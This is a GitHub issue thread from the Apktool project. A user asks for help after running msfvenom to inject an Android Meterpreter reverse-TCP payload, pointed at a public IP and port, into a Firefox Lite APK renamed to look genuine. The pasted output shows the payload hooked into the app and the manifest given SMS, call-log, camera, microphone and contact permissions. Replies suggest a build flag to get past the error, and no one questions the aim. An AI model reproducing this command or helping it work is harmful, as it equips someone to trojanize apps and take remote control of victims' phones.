### ISSUE TITLE
Error: Unable to rebuild apk with apktool 

### ISSUE THREAD

**Issue by J0kErF69** [iBotPeaches/Apktool#2393]
when I use this command "sudo msfvenom -x firefoxbase.apk -p android/meterpreter/reverse_tcp LHOST=3.23.201.37 LPORT=10124 -o firefoxlite.apk"
I get this error ,

((( 
W: invalid resource directory name: /tmp/d20200825-8168-zgyt3z/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_3551620386844138562.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 28, --version-code, 20460, --version-name, 2.5.1(20460), --no-version-vectors, -F, /tmp/APKTOOL16894973682521044136.tmp, -e, /tmp/APKTOOL16122644046346492789.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20200825-8168-zgyt3z/original/res, -M, /tmp/d20200825-8168-zgyt3z/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
)))

I tried so many solutions on the web but nothing work

this is the full output :

Using APK template: firefoxbase.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package org.mozilla.rocket.zmtzp
[*] Loading /tmp/d20200825-8168-zgyt3z/original/smali/org/mozilla/focus/FocusApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20200825-8168-zgyt3z/output.apk
[-] I: Using Apktool 2.4.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
W: invalid resource directory name: /tmp/d20200825-8168-zgyt3z/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_3551620386844138562.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 28, --version-code, 20460, --version-name, 2.5.1(20460), --no-version-vectors, -F, /tmp/APKTOOL16894973682521044136.tmp, -e, /tmp/APKTOOL16122644046346492789.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20200825-8168-zgyt3z/original/res, -M, /tmp/d20200825-8168-zgyt3z/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

**Comment by giacomoferretti** [comment]
Duplicate of #1811 #2219 #2338 #2391

**TL;DR** use `--use-aapt2` to fix this problem. You will get some warnings but at least it rebuilds the apk.

**Comment by J0kErF69** [comment]
> Duplicate of #1811 #2219 #2338 #2391
> 
> **TL;DR** use `--use-aapt2` to fix this problem. You will get some warnings but at least it rebuilds the apk.
> 
> I don't know how you can pass this parameter to `msfvenom`

is there anyway to edit it from apktool ?
can you show me how can I pass it with other tool?

**Comment by iBotPeaches** [comment]
> W: invalid resource directory name: /tmp/d20200825-8168-zgyt3z/original/res navigation

This as mentioned is a aapt/aapt2 issue. How msfvenom wraps Apktool to allow custom parameters - I'm not sure. I'm thinking the next release may make aapt2 the default anyway so it may be moot.
